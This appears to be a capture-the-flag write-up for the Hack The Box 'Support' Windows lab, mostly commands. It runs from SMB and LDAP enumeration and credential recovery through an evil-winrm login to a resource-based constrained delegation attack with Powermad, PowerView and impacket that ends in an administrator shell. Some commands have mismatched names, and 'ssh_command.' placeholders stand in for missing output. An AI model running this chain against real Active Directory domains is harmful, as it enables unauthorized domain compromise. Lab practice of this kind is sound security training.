Cu3rv0x
Support

Support


HTB Windows

nmap -A -p- -oA support 10.129.230.181 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA support 10.129.230.181

echo "10.129.230.181 dc01.support.htb support.htb nats-svc.support.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA support-udp 10.129.230.181

ping -c 1 10.129.230.181

ssh_command.

nmap -p- --open -T5 -v -n support 10.129.230.181

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn support 10.129.230.181 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p553,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.129.230.181 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

ldapsearch -H ldap://10.129.230.181 -x -s base namingcontexts

ssh_command.

ldapsearch -x -H ldap://10.129.230.181 -b 'DC=support,DC=htb'

ssh_command.

nxc smb 10.129.230.181 -u 'anonymous' -p '' --rid-brute 3000

ssh_command.

smbclient -N //support.htb/support-tools

ssh_command.

mget *

ssh_command.

unzip UserInfo.exe.zip

Abrimos dnSpy y abrimos el archivo UserInfo.exe

ssh_command.

Encontramos la siguiente contrasena. Y la desencriptamos.

ssh_command.

bh --domain support.htb --username 'ldap' --password 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --kerberos --nameserver 10.129.230.181 --dns-tcp --collection ALL --zip

ssh_command.

Iniciamos bloodhound

docker-compose -f bloodhound.yml up

ssh_command.

nxc smb 10.129.230.181 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

ssh_command.

ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap

ssh_command.

bc ldap/domain_users.json| grep -i 'Ironside'

ssh_command.

ssh_command.

nxc winrm 10.129.230.181 -u 'support' -p 'Ironside47pleasure40Watchful'

evil-winrm -i 10.129.230.181 -u 'support' -p 'Ironside47pleasure40Watchful'

ssh_command.

whoami

net user support

ssh_command.

net group

ssh_command.

upload Powermad.ps1

upload PowerView.ps1

Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount MyFakePC -Password $(ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force)

Import-Module .\PowerView.ps1

$Computersid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($Computersid ))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

ssh_command.

https://github.com/cuerv0x/krb5Config

bc /etc/krb5.conf

ssh_command.

impacket-getST -spn www/dc.support.htb -impersonate administrator -dc-ip 10.129.230.181 support.htb/MyFakePC$:P@ssword123

ssh_command.

export KRB5CCNAME=Administrator@www_dc.support.htb@SUPPORT.HTB.ccache

impacket-psexec -k dc.support.htb

ssh_command.

© 2025 Cu3rv0x